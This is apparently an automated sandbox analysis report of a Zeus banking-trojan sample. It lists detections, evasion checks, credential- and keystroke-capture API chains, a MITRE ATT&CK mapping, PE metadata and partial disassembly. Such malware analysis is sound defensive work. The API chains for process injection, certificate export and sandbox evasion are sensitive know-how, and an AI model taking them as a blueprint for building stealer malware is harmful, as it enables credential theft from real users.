
Windows Analysis Report
Rd1Kf1A4cB.bin

Overview

General Information

Sample Name: Rd1Kf1A4cB.bin (renamed file extension from bin to exe)
Analysis ID: 660113
MD5: 0ad89e86b34a226ff2a3042103afc7f1
SHA1: 91a27477c847ebf9ef3e2cb34e0bc93e323f449d
SHA256: f831d088c3a64b06843d970337f1c8877c9c1988d56720a7dee9d67efeaf78f0
Tags: exezitmo

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Found evasive API chain checking for process token information
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected potential crypto function
May initialize a security null descriptor
Contains functionality to launch a process as a different user
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to call native functions
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Program does not show much activity (idle)
Contains functionality to enumerate network shares
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • Rd1Kf1A4cB.exe (PID: 6516 cmdline: "C:\Users\user\Desktop\Rd1Kf1A4cB.exe" MD5: 0AD89E86B34A226FF2A3042103AFC7F1)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched


AV Detection

Source: Rd1Kf1A4cB.exe | Avira: detected
Source: Rd1Kf1A4cB.exe | Virustotal: Detection: 78%
Source: Rd1Kf1A4cB.exe | ReversingLabs: Detection: 96%
Source: Rd1Kf1A4cB.exe | Joe Sandbox ML: detected
Source: 0.2.Rd1Kf1A4cB.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_00411780 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_00411780

Compliance

Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Unpacked PE file: 0.2.Rd1Kf1A4cB.exe.400000.0.unpack
Source: Rd1Kf1A4cB.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_00405838 GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,0_2_00405838
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_00415B2D FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,0_2_00415B2D
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_00415BE8 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,0_2_00415BE8
Source: Rd1Kf1A4cB.exe, Rd1Kf1A4cB.exe, 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://www.google.com/webhp
Source: Rd1Kf1A4cB.exe, 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://www.google.com/webhpbcsocksGlobal
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_0040CC5C InternetReadFile,0_2_0040CC5C
Source: Rd1Kf1A4cB.exe, 00000000.00000002.260413898.000000000077A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_0040BB78 EnterCriticalSection,GetTickCount,LeaveCriticalSection,GetKeyboardState,ToUnicode,TranslateMessage,0_2_0040BB78
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_0040BCEA GetClipboardData,GlobalLock,EnterCriticalSection,LeaveCriticalSection,GlobalUnlock,0_2_0040BCEA
Source: Rd1Kf1A4cB.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_0040F964 InitiateSystemShutdownExW,ExitWindowsEx,0_2_0040F964
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_00404191 ExitWindowsEx,0_2_00404191
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_00404392 CreateMutexW,ExitWindowsEx,OpenEventW,CloseHandle,SetEvent,CloseHandle,CloseHandle,OpenMutexW,GetFileAttributesExW,ReadProcessMemory,CloseHandle,GetFileAttributesExW,ReadProcessMemory,Sleep,IsWellKnownSid,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,0_2_00404392
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_0041168D 0_2_0041168D
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_00412FBB 0_2_00412FBB
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_00411D38 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,0_2_00411D38
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_00404984 NtQueryInformationProcess,CloseHandle,NtCreateThread,0_2_00404984
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_00404A40 NtCreateUserProcess,GetProcessId,GetThreadContext,SetThreadContext,VirtualFreeEx,CloseHandle,0_2_00404A40
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_004063F7 NtCreateUserProcess,NtCreateThread,LdrLoadDll,GetFileAttributesExW,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,TranslateMessage,GetClipboardData,PFXImportCertStore,0_2_004063F7
Source: Rd1Kf1A4cB.exe | Virustotal: Detection: 78%
Source: Rd1Kf1A4cB.exe | ReversingLabs: Detection: 96%
Source: Rd1Kf1A4cB.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_00404D06 CloseHandle,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,CloseHandle,GetLengthSid,CloseHandle,Process32NextW,CloseHandle,0_2_00404D06
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_00411ADE GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,0_2_00411ADE
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_0040A15D CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,0_2_0040A15D
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_00409FE2 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,0_2_00409FE2
Source: classification engine | Classification label: mal84.evad.winEXE@1/0@0/0
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_00416937 CoCreateInstance,0_2_00416937

Data Obfuscation

Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Unpacked PE file: 0.2.Rd1Kf1A4cB.exe.400000.0.unpack .text:ER;.rdata:W;.rsrc:R; vs .text:ER;.data:W;.reloc:R;
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Unpacked PE file: 0.2.Rd1Kf1A4cB.exe.400000.0.unpack
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_00405838 GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,0_2_00405838
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_0040FE5C LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadImageW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_0040FE5C

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess (graph_0-10443)
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep (graph_0-10795)
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess (graph_0-10795)
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes (graph_0-10466)
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess (graph_0-10408)
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep (graph_0-10294)
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | API coverage: 2.0 %
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_00415B2D FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,0_2_00415B2D
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_00415BE8 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,0_2_00415BE8
Source: Rd1Kf1A4cB.exe, 00000000.00000002.260413898.000000000077A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_00414C0D mov edx, dword ptr fs:[00000030h] 0_2_00414C0D
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_00405838 GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,0_2_00405838
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_00403A5D HeapCreate,GetProcessHeap,InitializeCriticalSection,WSAStartup,GetLengthSid,GetCurrentProcessId,0_2_00403A5D
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_00404B6E LdrLoadDll,LdrGetDllHandle,LdrLoadDll,EnterCriticalSection,lstrcmpiW,LeaveCriticalSection,0_2_00404B6E
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_00413873 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree,0_2_00413873
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_00410542 GetTimeZoneInformation,0_2_00410542
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_0040F48A GetVersionExW,GetNativeSystemInfo,0_2_0040F48A
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_00406940 RegOpenKeyExW,GetLocalTime,0_2_00406940
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_0040CEC4 GetTickCount,GetUserDefaultUILanguage,GetModuleFileNameW,GetUserNameExW,0_2_0040CEC4
Source: Rd1Kf1A4cB.exe | Binary or memory string: S:(ML;;NRNWNX;;;LW)
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_0041369C HeapAlloc,socket,bind,closesocket,0_2_0041369C
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exe | Code function: 0_2_004133AC socket,bind,listen,closesocket,0_2_004133AC
MITRE ATT&CK Matrix (a number in parentheses is the count of matching signatures; techniques without a number are shown by the matrix but were not matched)

Tactic | Techniques
Initial Access | Valid Accounts (1), Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution | Native API (23), Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter
Persistence | Valid Accounts (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job
Privilege Escalation | Valid Accounts (1), Access Token Manipulation (11), Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job
Defense Evasion | Valid Accounts (1), Access Token Manipulation (11), Install Root Certificate (1), Software Packing (21), Software Packing, Steganography, Compile After Delivery, Indicator Removal from Tools
Credential Access | Input Capture (21), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery | Network Share Discovery (1), System Time Discovery (2), Security Software Discovery (11), Process Discovery (1), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (3)
Lateral Movement | Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot
Collection | Input Capture (21), Archive Collected Data (1), Clipboard Data (1), Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
Exfiltration | Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control | Encrypted Channel (2), Ingress Tool Transfer (1), Steganography, Protocol Impersonation, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
Network Effects | Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols
Remote Service Effects | Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Generate Fraudulent Advertising Revenue
Impact | System Shutdown/Reboot (1), Device Lockout, Delete Device Data, Data Encrypted for Impact
Source | Detection | Scanner | Label
Rd1Kf1A4cB.exe | 78% | Virustotal |
Rd1Kf1A4cB.exe | 96% | ReversingLabs | Win32.Trojan.Zeus
Rd1Kf1A4cB.exe | 100% | Avira | TR/Crypt.XPACK.Gen
Rd1Kf1A4cB.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
0.2.Rd1Kf1A4cB.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen
0.2.Rd1Kf1A4cB.exe.590000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.0.Rd1Kf1A4cB.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
No Antivirus matches
No Antivirus matches
No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.google.com/webhpbcsocksGlobal | Rd1Kf1A4cB.exe, 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://www.google.com/webhp | Rd1Kf1A4cB.exe, Rd1Kf1A4cB.exe, 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp | false | | high
No contacted IP infos
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 660113
Start date and time: 2022-07-09 04:01:11 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 14s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Rd1Kf1A4cB.bin (renamed file extension from bin to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal84.evad.winEXE@1/0@0/0
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 99.3% (good quality ratio 91.3%)
  • Quality average: 83.3%
  • Quality standard deviation: 29.6%
HCA Information:
  • Successful, ratio: 88%
  • Number of executed functions: 4
  • Number of non-executed functions: 107
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
  • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, fs.microsoft.com, go.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
  • Not all processes were analyzed; the report is missing behavior information
No simulations
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.50978452876486
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Rd1Kf1A4cB.exe
File size: 96256 bytes
MD5: 0ad89e86b34a226ff2a3042103afc7f1
SHA1: 91a27477c847ebf9ef3e2cb34e0bc93e323f449d
SHA256: f831d088c3a64b06843d970337f1c8877c9c1988d56720a7dee9d67efeaf78f0
SHA512: 66149bae72c2c2cff1ce25b03c7f109ab64f8bc80fa22712836bf08843df37cf6e282e4a4776a33bf8c864f0dacb1b928ab44191cb49b65e1c3bad3e53b9d2f4
SSDEEP: 1536:uxDWt8Z1R4ayClVUbHTcM7Y62lO+5FZyoaGSMCDjTyF1ac9OtRHhmV:+Wt8ZIalVQzccKO+5FqBIItRAV
TLSH: 8693021941C6B4ABEAA44BF71BB5F117302413A14FB246E259A76E3FCF793CE0294349
File Content Preview: MZ......................@...................................|...........!..L.!This program cannot be run in DOS mode....$...PE..L...%..L.....................d............... ....@.........................................................................dz.
Icon Hash: 00828e8e8686b000
Entrypoint: 0x401cd0
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: NO_SEH
Time Stamp: 0x4CAF0C25 [Fri Oct 8 12:18:45 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 6ef02dd1adb61f4fee262f301b547fa3
Instruction
push ebp
mov ebp, esp
sub esp, 000002A0h
push ebx
push esi
push edi
push ecx
sub eax, ecx
add dword ptr [ebp-000000B8h], eax
sub dword ptr [ebp-000000BBh], eax
mov edi, dword ptr [00402034h]
lea eax, dword ptr [ebp-0Ch]
push eax
mov byte ptr [ebp-0Ch], 00000000h
call edi
xor eax, dword ptr [ebp-1Dh]
mov dword ptr [ebp-1Fh], eax
or dword ptr [ebp-1Fh], eax
mov ebx, dword ptr [0040200Ch]
call ebx
test eax, eax
jne 00007F03A4A2EA54h
call ecx
and dword ptr [ebp-00000171h], eax
and dword ptr [ebp-000001D1h], eax
lea ecx, dword ptr [ebp-6Ch]
push ecx
push FFFFFDF1h
call dword ptr [00402030h]
add esi, dword ptr [ebp-00000220h]
or dword ptr [ebp-0000010Dh], eax
call ebx
test eax, eax
jne 00007F03A4A2EA54h
call esp
or ebx, edi
xor ebx, dword ptr [ebp-00000295h]
push 0000000Fh
push 00000000h
call dword ptr [00402024h]
test eax, eax
jne 00007F03A4A2EA54h
mov edx, dword ptr [edx]
lea edx, dword ptr [ebp-01h]
push edx
mov byte ptr [ebp-01h], 00000000h
call edi
call 00007F03A4A2E14Dh
test eax, eax
je 00007F03A4A2EAA6h
push 00000000h
push 00000000h
push 00000000h
push 00000000h
push 00000000h
push 00000000h
call dword ptr [00402020h]
or ecx, dword ptr [ebp-2Bh]
sub dword ptr [ebp-2Ch], eax
lea eax, dword ptr [ebp-00000268h]
push eax
push FFFFFF23h
call dword ptr [00402030h]
sub edi, dword ptr [ebp+00000000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x17a64 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x18000 | 0x280 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x2000 | 0x20 | .rdata
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2048 | 0xac | .rdata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xe38 | 0x1000 | False | 0.58837890625 | data | 5.938180207293575 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2000 | 0x15c16 | 0x15e00 | False | 0.9077901785714285 | data | 7.598976363385786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x18000 | 0x6000 | 0x400 | False | 0.3388671875 | data | 3.245150535902098 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country
RT_DIALOG | 0x180a0 | 0x6a | data | English | United States
RT_MANIFEST | 0x18110 | 0x16a | XML 1.0 document, ISO-8859 text, with CRLF line terminators | English | United States

DLL | Import
KERNEL32 | GetProcAddress, GetCurrentThread, LoadLibraryA, LocalFree, GetSystemInfo, GetModuleHandleA, CompareStringA, LocalAlloc, CloseHandle
USER32.dll | BeginPaint, CharNextA, DispatchMessageA, GetMessageA, TranslateMessage
ADVAPI32.dll | RegCloseKey

Language of compilation system | Country where language is spoken
English | United States
No network behavior found

Target ID: 0
Start time: 04:02:18
Start date: 09/07/2022
Path: C:\Users\user\Desktop\Rd1Kf1A4cB.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Rd1Kf1A4cB.exe"
Imagebase: 0x400000
File size: 96256 bytes
MD5 hash: 0AD89E86B34A226FF2A3042103AFC7F1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low


Execution Graph

Execution Coverage: 0.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 21.7%
Total number of Nodes: 696
Total number of Limit Nodes: 5
10656 40a5ff CreateFileW 10654->10656 10655->10614 10656->10655 10657 40a62a 10656->10657 10658 40a63b WriteFile 10657->10658 10659 40a68b FlushFileBuffers CloseHandle 10658->10659 10663 40a65c 10658->10663 10659->10655 10660 40a6a2 10659->10660 10665 4158d7 SetFileAttributesW DeleteFileW 10660->10665 10662 40a680 10662->10659 10663->10659 10663->10662 10664 40a66d WriteFile 10663->10664 10664->10662 10665->10655 10667 4062a1 10666->10667 10668 4062be VirtualAllocEx 10666->10668 10667->10668 10670 406364 10667->10670 10669 4062df 10668->10669 10668->10670 10671 4062f1 10669->10671 10672 4062e5 ResetEvent 10669->10672 10670->10555 10681 40a754 InitializeCriticalSection GetProcAddress GetProcAddress GetProcAddress 10670->10681 10673 406320 10671->10673 10682 414d4a 10671->10682 10672->10671 10674 4063d2 10673->10674 10680 406329 10673->10680 10694 4061f8 10674->10694 10677 4063c2 SetEvent 10677->10670 10679 4063e2 SetEvent 10679->10670 10680->10670 10680->10677 10681->10555 10701 414d05 VirtualQueryEx 10682->10701 10685 414e56 10685->10671 10686 414d6a VirtualProtectEx 10686->10685 10687 414d85 10686->10687 10688 414d92 ReadProcessMemory 10687->10688 10689 414e42 VirtualProtectEx 10688->10689 10691 414dac 10688->10691 10689->10685 10690 414df1 10690->10689 10691->10690 10692 414df3 WriteProcessMemory 10691->10692 10692->10690 10693 414e1e WriteProcessMemory 10692->10693 10693->10690 10695 406288 10694->10695 10697 40620a 10694->10697 10695->10670 10695->10679 10696 414d05 VirtualQueryEx 10696->10697 10697->10695 10697->10696 10698 406235 VirtualProtectEx 10697->10698 10700 406264 VirtualProtectEx 10697->10700 10698->10697 10699 40624a WriteProcessMemory 10698->10699 10699->10697 10699->10700 10700->10697 10702 414d24 10701->10702 10702->10685 10702->10686 10706 411246 10703->10706 10711 4106b9 10706->10711 10709 40423a 10709->10297 10709->10301 10710 410418 HeapFree 10710->10709 10713 4106cb 10711->10713 10712 410718 10712->10709 10712->10710 10713->10712 10714 
4103a8 3 API calls 10713->10714 10715 410700 wvnsprintfW 10713->10715 10714->10713 10715->10713 10717 415783 GetFileSizeEx 10716->10717 10720 4043b8 10716->10720 10718 415792 10717->10718 10719 4157e8 CloseHandle 10717->10719 10718->10719 10718->10720 10721 4157a7 VirtualAlloc 10718->10721 10719->10720 10720->10305 10725 40401e 10720->10725 10721->10719 10722 4157bc ReadFile 10721->10722 10723 4157d2 10722->10723 10724 4157da VirtualFree 10722->10724 10723->10720 10723->10724 10724->10719 10727 40403f 10725->10727 10726 40407b 10729 4157f8 10726->10729 10727->10726 10854 41046b 10727->10854 10730 415801 VirtualFree 10729->10730 10731 41580f 10729->10731 10730->10731 10732 415816 CloseHandle 10731->10732 10733 41581d 10731->10733 10732->10733 10733->10305 10736 405487 10734->10736 10735 4043fd 10735->10310 10741 403cc5 10735->10741 10736->10735 10737 410628 MultiByteToWideChar 10736->10737 10738 4054da 10737->10738 10738->10735 10739 4054ee StrCmpNIW 10738->10739 10739->10735 10740 4054fb lstrcmpiW 10739->10740 10740->10735 10742 403cd9 10741->10742 10743 4149f0 StringFromGUID2 10742->10743 10744 403cfa CreateMutexW 10743->10744 10744->10324 10744->10325 10746 413a77 10745->10746 10747 413a6e CloseHandle 10745->10747 10746->10324 10747->10746 10749 4060d3 10748->10749 10750 4060c9 10748->10750 10865 414526 RegOpenKeyExW 10749->10865 10857 403f5f 10750->10857 10753 410418 HeapFree 10754 40612c 10753->10754 10754->10341 10755 4060e9 10755->10753 10755->10754 10757 404d24 CreateToolhelp32Snapshot 10756->10757 10758 404d3b Process32FirstW 10757->10758 10759 404e6d 10757->10759 10767 404d59 10758->10767 10760 410418 HeapFree 10759->10760 10762 404468 10760->10762 10761 404e5f CloseHandle 10761->10757 10761->10759 10762->10351 10762->10352 10763 404e48 Process32NextW 10763->10767 10765 404d9d OpenProcess 10766 404e43 CloseHandle 10765->10766 10765->10767 10766->10763 10767->10761 10767->10763 10767->10765 10768 411a2c 